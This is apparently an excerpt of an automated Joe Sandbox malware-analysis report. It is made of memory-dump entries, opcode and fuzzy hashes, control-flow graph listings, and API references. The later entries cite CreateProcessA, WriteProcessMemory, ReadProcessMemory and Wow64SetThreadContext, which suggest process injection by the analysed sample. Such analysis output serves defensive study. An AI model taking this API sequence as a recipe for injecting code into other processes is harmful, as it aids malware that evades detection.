                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: Teeq$Teeq
                    • API String ID: 0-1240912287
                    • Opcode ID: 985d7805214504a8f30ed16d9d868485f72fec41ac3a2c1c372bb8bc57ff5fa2
                    • Instruction ID: f228e2a7c4931868991d7bd8246b09e4a063bbcf6eb983bc249bf40bfe03ed7e
                    • Opcode Fuzzy Hash: 985d7805214504a8f30ed16d9d868485f72fec41ac3a2c1c372bb8bc57ff5fa2
                    • Instruction Fuzzy Hash: DA814672B111259FC7049BA4DC049EFBFB6FF86362F01816BE602EB290D6318D058BE1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 813 75691db-75691fb 815 7569236 813->815 816 75691fd 813->816 817 7569244 815->817 818 7569202-7569217 816->818 819 7569249-756925e 817->819 818->815 820 7569219 818->820 825 7569428-756942f 819->825 826 7569264 819->826 820->815 820->816 820->817 821 7569274-75692c5 820->821 822 7569393-7569411 call 756e0a8 820->822 823 7569220-7569234 820->823 824 756935a-756936d call 756b748 820->824 820->825 842 75692c7-75692cd 821->842 843 75692dd-756932f 821->843 854 7569418-7569423 822->854 823->818 860 7569372 call 756bf64 824->860 861 7569372 call 756bf84 824->861 862 7569372 call 756bfa4 824->862 826->817 826->821 826->822 826->824 826->825 827 7569273 826->827 827->821 834 7569378-756937a call 756da88 837 7569380-756938e 834->837 837->819 844 75692d1-75692d3 842->844 845 75692cf 842->845 856 7569347-7569355 843->856 857 7569331-7569337 843->857 844->843 845->843 854->819 856->819 858 756933b-756933d 857->858 859 7569339 857->859 858->856 859->856 860->834 861->834 862->834
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: $eq$$eq
                    • API String ID: 0-2246304398
                    • Opcode ID: b54e77149813e14e35d2d0515e5385c9a0e5521bb08f6606b49d86672eefec1f
                    • Instruction ID: 7ef555149733f114d8ba6a8f8671df81b58f728959e47fb7cabaccf6fc26fb5e
                    • Opcode Fuzzy Hash: b54e77149813e14e35d2d0515e5385c9a0e5521bb08f6606b49d86672eefec1f
                    • Instruction Fuzzy Hash: FE51C4B8B002099FDB049F75C9597AE7AA3FBC8700F21842AE906DB394DB76DC418B40

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 977 75651e8-75651f3 978 75651f4 977->978 979 75651d6-75651e5 978->979 980 75651f6-7565213 978->980 979->977 982 756521a 980->982 983 756521f-7565234 982->983 984 7565353-756537f 983->984 985 756523a 983->985 1008 7565385-756539c 984->1008 985->982 985->984 986 7565325-7565330 985->986 987 7565255-7565283 985->987 988 7565285 985->988 989 7565303-7565320 985->989 990 75652f3-75652fe 985->990 991 75652c0-75652d9 985->991 992 7565241-7565245 985->992 993 75652de-75652ee 985->993 994 75652a9-75652bb 985->994 1001 7565336-756533b 986->1001 987->983 1002 756528f-7565291 988->1002 989->983 990->983 991->983 995 7565247-756524c 992->995 996 756524e 992->996 993->983 994->983 998 7565253 995->998 996->998 998->983 1005 7565343-756534e 1001->1005 1006 7565299-75652a4 1002->1006 1005->983 1006->983 1010 756539e call 7566207 1008->1010 1011 756539e call 75661f7 1008->1011 1012 756539e call 7566142 1008->1012 1013 756539e call 7566260 1008->1013 1014 756539e call 756611c 1008->1014 1015 756539e call 75661ac 1008->1015 1016 756539e call 756621d 1008->1016 1017 756539e call 7566248 1008->1017 1018 756539e call 75661d9 1008->1018 1009 75653a4-75653ad 1010->1009 1011->1009 1012->1009 1013->1009 1014->1009 1015->1009 1016->1009 1017->1009 1018->1009
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: Teeq$Teeq
                    • API String ID: 0-1240912287
                    • Opcode ID: a9b798efec25ab7b4561d290621b7b0e35787ce570ca1c3ce6f876661a81b7d7
                    • Instruction ID: 787e06fed7f320101a9cea90644331c5023329f738f148420be85c344ade6130
                    • Opcode Fuzzy Hash: a9b798efec25ab7b4561d290621b7b0e35787ce570ca1c3ce6f876661a81b7d7
                    • Instruction Fuzzy Hash: 2E41F571B600198FCB04DFA9C8596BFBBF7FB98300F11446AD606EB390DA319D058BA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1019 75638d6-75638da 1020 756429d-75642ab 1019->1020 1021 75638db-75638f0 1019->1021 1021->1020 1022 75638f1-75638fc 1021->1022 1024 7563902-756390e 1022->1024 1025 756391a-7563929 1024->1025 1027 7563988-756398c 1025->1027 1028 7563a34-7563a9e 1027->1028 1029 7563992-756399b 1027->1029 1028->1020 1067 7563aa4-7563feb 1028->1067 1030 7563896-75638a2 1029->1030 1031 75639a1-75639b7 1029->1031 1030->1020 1033 75638a8-75638b4 1030->1033 1037 7563a09-7563a1b 1031->1037 1038 75639b9-75639bc 1031->1038 1035 75638b6-75638ca 1033->1035 1036 756392b-7563931 1033->1036 1035->1036 1046 75638cc-75638d5 1035->1046 1036->1020 1039 7563937-756394f 1036->1039 1047 7563a21-7563a24 1037->1047 1048 75641dc-7564292 1037->1048 1038->1020 1041 75639c2-75639ff 1038->1041 1039->1020 1050 7563955-756397d 1039->1050 1041->1028 1063 7563a01-7563a07 1041->1063 1046->1019 1051 7563a27-7563a31 1047->1051 1048->1020 1050->1027 1063->1037 1063->1038 1145 7564002-7564095 1067->1145 1146 7563fed-7563ff7 1067->1146 1147 75640a0-7564133 1145->1147 1146->1147 1148 7563ffd 1146->1148 1149 756413e-75641d1 1147->1149 1148->1149 1149->1048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: D
                    • API String ID: 0-2746444292
                    • Opcode ID: 52bc5068f77d66063e2e893888aa6d94c8219e7f7607cf368d4f8745ba00a228
                    • Instruction ID: 6b2153bb163f373270c017d67b7ca32c923265e3dec5fe53160030f54ae8a151
                    • Opcode Fuzzy Hash: 52bc5068f77d66063e2e893888aa6d94c8219e7f7607cf368d4f8745ba00a228
                    • Instruction Fuzzy Hash: D352D8B4A102298FDB64DF28C998A9DBBB6FF89300F1041D9D509A7365DB34AEC1CF51
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: T(z
                    • API String ID: 0-3184255237
                    • Opcode ID: 06304fd42bed75b1c5d33f89b36e8606d45da21d37cb85093b58df8caf4fcdcb
                    • Instruction ID: 63b08f3b333124c848a32d293fd8f80659e41b3c6ee80a84327f4066cedfb931
                    • Opcode Fuzzy Hash: 06304fd42bed75b1c5d33f89b36e8606d45da21d37cb85093b58df8caf4fcdcb
                    • Instruction Fuzzy Hash: AE41E7B2F182059BDF588EA585556EFB6B6BBC9600F108C27D502AB394DE70CD018B51
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 29b0b5ac2516c8c26319b2d6994d7334a2a0e3b611639317fac72f207c77f659
                    • Instruction ID: 00cb3274532921e21df6589dac91801613f8edef1930e714e4d163b06297d6c4
                    • Opcode Fuzzy Hash: 29b0b5ac2516c8c26319b2d6994d7334a2a0e3b611639317fac72f207c77f659
                    • Instruction Fuzzy Hash: 1C221731E006198FDB64EF69C88479DB7B1BF89314F1485A9D81AEB361DB30AE85CF50
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1907a96c6310603e82d825fde839777106dab8b6cc02750b2c157b64b8a6c520
                    • Instruction ID: 301d3007f8f4854662bd9dea8dda7022025411ea3d97a4dede7bd06bdb46c8a9
                    • Opcode Fuzzy Hash: 1907a96c6310603e82d825fde839777106dab8b6cc02750b2c157b64b8a6c520
                    • Instruction Fuzzy Hash: B561E4B1624101DFC714CF18D9884E9BBAAFB86351B47D856E406EF261DB34ED84CB85
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 349d03890f22028fa0514f8ffe23efde82f8c99dd3d130bf00f9db524e0555b7
                    • Instruction ID: c690762680d076d5e05c391f98954835917bd4d6e82a10c030fd069812eec350
                    • Opcode Fuzzy Hash: 349d03890f22028fa0514f8ffe23efde82f8c99dd3d130bf00f9db524e0555b7
                    • Instruction Fuzzy Hash: 6661D6B1624101DFC714CF28D9884A97BBAFB86300F47D856E406DF2A1DB34ED85CB95
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f05064883a4d18f0af57cffad44e7f544228622dcdde206b8d9f8ea8327b8d8
                    • Instruction ID: 18bfbfc3ca3ffd6024ba771d597a82616384305fde615a8d05a0a65d763d6d05
                    • Opcode Fuzzy Hash: 9f05064883a4d18f0af57cffad44e7f544228622dcdde206b8d9f8ea8327b8d8
                    • Instruction Fuzzy Hash: AC61C4B1624101DFC754CF18D9884A97BFAFB86300F479856E806DF2A1DB34ED84CB95
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a899aba1e788bdcb0c09e3b61788a3deda68fa46d40ce77f5d59ca5092296185
                    • Instruction ID: 4814bb25d3ec06c4b6cd6cd9c6a2829706cafec79eee4974fd9bb896ae1add4e
                    • Opcode Fuzzy Hash: a899aba1e788bdcb0c09e3b61788a3deda68fa46d40ce77f5d59ca5092296185
                    • Instruction Fuzzy Hash: 83A00219EEE51480D0441C6201940B4C93F030B04CD123D090D1F733022400F044204C

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 751 6ae5b20-6ae5b42 752 6ae5b4b-6ae5b55 751->752 753 6ae5b44-6ae5b4a 751->753 755 6ae5b5b-6ae5b74 call 6ae277c * 2 752->755 756 6ae5d91-6ae5dbd 752->756 763 6ae5b7a-6ae5b9c 755->763 764 6ae5dc4-6ae5e1d 755->764 756->764 771 6ae5b9e-6ae5bac call 6ae278c 763->771 772 6ae5bad-6ae5bbc 763->772 777 6ae5bbe-6ae5bdb 772->777 778 6ae5be1-6ae5c02 772->778 777->778 786 6ae5c04-6ae5c15 778->786 787 6ae5c52-6ae5c7a 778->787 790 6ae5c17-6ae5c2f call 6ae279c 786->790 791 6ae5c44-6ae5c48 786->791 810 6ae5c7d call 6ae5ed8 787->810 811 6ae5c7d call 6ae6010 787->811 812 6ae5c7d call 6ae62c1 787->812 798 6ae5c34-6ae5c42 790->798 799 6ae5c31-6ae5c32 790->799 791->787 794 6ae5c80-6ae5ca5 801 6ae5ceb 794->801 802 6ae5ca7-6ae5cbc 794->802 798->790 798->791 799->798 801->756 802->801 805 6ae5cbe-6ae5ce1 802->805 805->801 809 6ae5ce3 805->809 809->801 810->794 811->794 812->794
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: Hiq$Hiq
                    • API String ID: 0-2624443307
                    • Opcode ID: 690452b759d78161f36239327680967dfeb05a97e86dca84215cff04868d392e
                    • Instruction ID: 4d76c8ff861c3e3e8b7f310d3c9618de54992f367773b2f69fee7891cf33b9cb
                    • Opcode Fuzzy Hash: 690452b759d78161f36239327680967dfeb05a97e86dca84215cff04868d392e
                    • Instruction Fuzzy Hash: 48715E34B002188FCB55EBA8C5949AE77F2FF89314B2544A9D502EB3A1CB36ED45CF61

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 885 7569239-7569241 887 7569244 885->887 888 7569249-756925e 887->888 889 7569264 888->889 890 7569428-756942f 888->890 889->887 889->890 891 7569274-75692c5 889->891 892 7569393-7569411 call 756e0a8 889->892 893 7569273 889->893 894 756935a-756936d call 756b748 889->894 908 75692c7-75692cd 891->908 909 75692dd-756932f 891->909 920 7569418-7569423 892->920 893->891 929 7569372 call 756bf64 894->929 930 7569372 call 756bf84 894->930 931 7569372 call 756bfa4 894->931 900 7569378-756937a call 756da88 903 7569380-756938e 900->903 903->888 910 75692d1-75692d3 908->910 911 75692cf 908->911 922 7569347-7569355 909->922 923 7569331-7569337 909->923 910->909 911->909 920->888 922->888 924 756933b-756933d 923->924 925 7569339 923->925 924->922 925->922 929->900 930->900 931->900
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: $eq$$eq
                    • API String ID: 0-2246304398
                    • Opcode ID: 56d1c03259b35bae3a79c98b896fe7215f92b4711db56aa987b21d6c8d6379a7
                    • Instruction ID: 9243231b89514aff861044c9b8f9c6884f41ac1168cd80bf83c6b75e91c33717
                    • Opcode Fuzzy Hash: 56d1c03259b35bae3a79c98b896fe7215f92b4711db56aa987b21d6c8d6379a7
                    • Instruction Fuzzy Hash: A451A378B002099FDB049F75C959BAE7AA3FFC8700F21842AE906DB394DB76DC018B50

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 932 7569273 933 7569274-75692c5 932->933 939 75692c7-75692cd 933->939 940 75692dd-756932f 933->940 941 75692d1-75692d3 939->941 942 75692cf 939->942 948 7569347-7569355 940->948 949 7569331-7569337 940->949 941->940 942->940 952 7569249-756925e 948->952 950 756933b-756933d 949->950 951 7569339 949->951 950->948 951->948 953 7569264 952->953 954 7569428-756942f 952->954 953->932 953->933 953->954 955 7569244 953->955 956 7569393-75693d3 953->956 957 756935a-756936d call 756b748 953->957 955->952 965 75693dd-75693eb 956->965 972 7569372 call 756bf64 957->972 973 7569372 call 756bf84 957->973 974 7569372 call 756bfa4 957->974 961 7569378-756937a call 756da88 963 7569380-756938e 961->963 963->952 966 75693f1-7569400 965->966 968 7569409-7569411 call 756e0a8 966->968 970 7569418-7569423 968->970 970->952 972->961 973->961 974->961
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: $eq$$eq
                    • API String ID: 0-2246304398
                    • Opcode ID: 8141b20647a4a7b9c58c0b2f9618b6f8c6b8d98e4b242e46c4308119ab25490a
                    • Instruction ID: 6bbba864523b8862f5a74196bb91c2b9993dcfd51904566ded71e0185734cf35
                    • Opcode Fuzzy Hash: 8141b20647a4a7b9c58c0b2f9618b6f8c6b8d98e4b242e46c4308119ab25490a
                    • Instruction Fuzzy Hash: 1A417178B002089FDB049F75C959BAE7AA3BFC8701F25846AE9069B7D4DB76DC018B50

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1174 4767113-47671ad 1177 47671e6-4767206 1174->1177 1178 47671af-47671b9 1174->1178 1183 476723f-476726e 1177->1183 1184 4767208-4767212 1177->1184 1178->1177 1179 47671bb-47671bd 1178->1179 1180 47671e0-47671e3 1179->1180 1181 47671bf-47671c9 1179->1181 1180->1177 1185 47671cd-47671dc 1181->1185 1186 47671cb 1181->1186 1194 47672a7-4767361 CreateProcessA 1183->1194 1195 4767270-476727a 1183->1195 1184->1183 1187 4767214-4767216 1184->1187 1185->1185 1188 47671de 1185->1188 1186->1185 1189 4767218-4767222 1187->1189 1190 4767239-476723c 1187->1190 1188->1180 1192 4767226-4767235 1189->1192 1193 4767224 1189->1193 1190->1183 1192->1192 1196 4767237 1192->1196 1193->1192 1206 4767363-4767369 1194->1206 1207 476736a-47673f0 1194->1207 1195->1194 1197 476727c-476727e 1195->1197 1196->1190 1199 4767280-476728a 1197->1199 1200 47672a1-47672a4 1197->1200 1201 476728e-476729d 1199->1201 1202 476728c 1199->1202 1200->1194 1201->1201 1204 476729f 1201->1204 1202->1201 1204->1200 1206->1207 1217 47673f2-47673f6 1207->1217 1218 4767400-4767404 1207->1218 1217->1218 1219 47673f8 1217->1219 1220 4767406-476740a 1218->1220 1221 4767414-4767418 1218->1221 1219->1218 1220->1221 1222 476740c 1220->1222 1223 476741a-476741e 1221->1223 1224 4767428-476742c 1221->1224 1222->1221 1223->1224 1225 4767420 1223->1225 1226 476743e-4767445 1224->1226 1227 476742e-4767434 1224->1227 1225->1224 1228 4767447-4767456 1226->1228 1229 476745c 1226->1229 1227->1226 1228->1229 1231 476745d 1229->1231 1231->1231
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0476734E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 4d9ecd3f0d8c37fb9711d08133c912469ea1c1820d851ca8945eeae7a8b61dbb
                    • Instruction ID: 11998a5b2c94bec5a78a97912c82e76cbbbab3775092789b89aa00e1f32b5422
                    • Opcode Fuzzy Hash: 4d9ecd3f0d8c37fb9711d08133c912469ea1c1820d851ca8945eeae7a8b61dbb
                    • Instruction Fuzzy Hash: F1916D71D002198FEB14CFA8C940BEDBBB2BF48314F14856AEC19A7394DB74A985CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1232 4767118-47671ad 1234 47671e6-4767206 1232->1234 1235 47671af-47671b9 1232->1235 1240 476723f-476726e 1234->1240 1241 4767208-4767212 1234->1241 1235->1234 1236 47671bb-47671bd 1235->1236 1237 47671e0-47671e3 1236->1237 1238 47671bf-47671c9 1236->1238 1237->1234 1242 47671cd-47671dc 1238->1242 1243 47671cb 1238->1243 1251 47672a7-4767361 CreateProcessA 1240->1251 1252 4767270-476727a 1240->1252 1241->1240 1244 4767214-4767216 1241->1244 1242->1242 1245 47671de 1242->1245 1243->1242 1246 4767218-4767222 1244->1246 1247 4767239-476723c 1244->1247 1245->1237 1249 4767226-4767235 1246->1249 1250 4767224 1246->1250 1247->1240 1249->1249 1253 4767237 1249->1253 1250->1249 1263 4767363-4767369 1251->1263 1264 476736a-47673f0 1251->1264 1252->1251 1254 476727c-476727e 1252->1254 1253->1247 1256 4767280-476728a 1254->1256 1257 47672a1-47672a4 1254->1257 1258 476728e-476729d 1256->1258 1259 476728c 1256->1259 1257->1251 1258->1258 1261 476729f 1258->1261 1259->1258 1261->1257 1263->1264 1274 47673f2-47673f6 1264->1274 1275 4767400-4767404 1264->1275 1274->1275 1276 47673f8 1274->1276 1277 4767406-476740a 1275->1277 1278 4767414-4767418 1275->1278 1276->1275 1277->1278 1279 476740c 1277->1279 1280 476741a-476741e 1278->1280 1281 4767428-476742c 1278->1281 1279->1278 1280->1281 1282 4767420 1280->1282 1283 476743e-4767445 1281->1283 1284 476742e-4767434 1281->1284 1282->1281 1285 4767447-4767456 1283->1285 1286 476745c 1283->1286 1284->1283 1285->1286 1288 476745d 1286->1288 1288->1288
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0476734E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: ba89db80497d7269d4d8085eb3a69a774975f76357906c6c0c06cbea37a4ee3b
                    • Instruction ID: 0356439caf7d221b5adf8466ec8cdc4dc9af6389fbcce08d5ee405efc977ee27
                    • Opcode Fuzzy Hash: ba89db80497d7269d4d8085eb3a69a774975f76357906c6c0c06cbea37a4ee3b
                    • Instruction Fuzzy Hash: 73917B71D002198FEB14CFA8C940BEDBBB2BF48318F14856AEC19A7354DB74A985CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1289 27044b0-27059b9 CreateActCtxA 1293 27059c2-2705a1c 1289->1293 1294 27059bb-27059c1 1289->1294 1301 2705a2b-2705a2f 1293->1301 1302 2705a1e-2705a21 1293->1302 1294->1293 1303 2705a40-2705a70 1301->1303 1304 2705a31-2705a3d 1301->1304 1302->1301 1308 2705a22-2705a27 1303->1308 1309 2705a72-2705af4 1303->1309 1304->1303 1308->1301
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 027059A9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 4b09e94544e6b344d5b9f6e25191643ab7ed3d1baf396569b17e5d01e008bb1f
                    • Instruction ID: a422f88232cdfda5d21d6614d2c52f6b865f6ca0105b660f39a6b21b730ce978
                    • Opcode Fuzzy Hash: 4b09e94544e6b344d5b9f6e25191643ab7ed3d1baf396569b17e5d01e008bb1f
                    • Instruction Fuzzy Hash: C341E3B0D10719CBDB24CFAAC984B9DBBF6BF48304F60816AD408BB251DB756949CF90
                    Memory Dump Source
                    • Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 615aef5cb2b293660689c9a4dd7f318a6ac1671e772e290adaef8a2e62df7e97
                    • Instruction ID: fc892503b425218dcdec9777b09d4dbfb82072c06550758b8bc0e5a5ee77c645
                    • Opcode Fuzzy Hash: 615aef5cb2b293660689c9a4dd7f318a6ac1671e772e290adaef8a2e62df7e97
                    • Instruction Fuzzy Hash: 573189B1814648CFDB11CBA9C8987ADBFF1BF46308F944289C045AB2A5C775A90ACF11
                    APIs
                    • CreateActCtxA.KERNEL32(?), ref: 027059A9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2091609888.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Offset: 02700000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2700000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: Create
                    • String ID:
                    • API String ID: 2289755597-0
                    • Opcode ID: 3a1bee7f8ba38e59766a003b67a7755f94235cbab3a3fc06a9e491f918f9c1dd
                    • Instruction ID: 691f6756bdde67bfd79be107226db40dce0b6928293eec6d5fedaa8c77ae9c28
                    • Opcode Fuzzy Hash: 3a1bee7f8ba38e59766a003b67a7755f94235cbab3a3fc06a9e491f918f9c1dd
                    • Instruction Fuzzy Hash: 9741CFB0D10719CBDB24DFAAC984A9DBBF6BF48304F20816AD408BB255DB756949CF50
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04766F20
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: e7feade6be0656ac1e06a4cdb5d9415d4206266e7d502bf0616b4eb6b5548d64
                    • Instruction ID: 91f621183fc65413676a1999d40fc3d625e2ba5aeb2484c1e21c61311ca00e1d
                    • Opcode Fuzzy Hash: e7feade6be0656ac1e06a4cdb5d9415d4206266e7d502bf0616b4eb6b5548d64
                    • Instruction Fuzzy Hash: A22148759003099FDB10CFAAD881BDEBFF5FF48320F14842AE919A7241C7799944DBA1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b635343f6f52e0dc92474a01ef4582861afa1f6dbec67491408df6a16a727b57
                    • Instruction ID: 82564845ab1a7bd1afea7eb255141bffdbfb19ddd6394c7c01326cc3eed53b1d
                    • Opcode Fuzzy Hash: b635343f6f52e0dc92474a01ef4582861afa1f6dbec67491408df6a16a727b57
                    • Instruction Fuzzy Hash: 9E21DE76E04228DBCB30DFA5C8047EEBBF6AB8A710F10805AD946B7241D735BD04DBA0
                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04766F20
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: e22cc20b89ffa6e00dcd2f57f3ee204b772fb4f4de848d24eba5ed1d376276cc
                    • Instruction ID: 625d772572e512e5939fbf759af18abd37b248d03dae2123d478c7991f22e816
                    • Opcode Fuzzy Hash: e22cc20b89ffa6e00dcd2f57f3ee204b772fb4f4de848d24eba5ed1d376276cc
                    • Instruction Fuzzy Hash: 622127759003499FDB10CFAAC985BDEBBF5FF48320F50842AE919A7240C779A944DBA0
                    APIs
                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04767000
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: MemoryProcessRead
                    • String ID:
                    • API String ID: 1726664587-0
                    • Opcode ID: 1498dd0216afceeebfc6b18b2ee75c05dbefdc1999aa0e83ea97a01f0550ea91
                    • Instruction ID: 3e12c724a291eac5d821047ca42f7b1cf65b51bdd8f5e44bf5f040d62014604a
                    • Opcode Fuzzy Hash: 1498dd0216afceeebfc6b18b2ee75c05dbefdc1999aa0e83ea97a01f0550ea91
                    • Instruction Fuzzy Hash: BE214F75C003099FDB10CFAAD841AEEBBF5FF48320F50842AE519A3250D775A941DBA0
                    APIs
                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04766D76
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID: ContextThreadWow64
                    • String ID:
                    • API String ID: 983334009-0
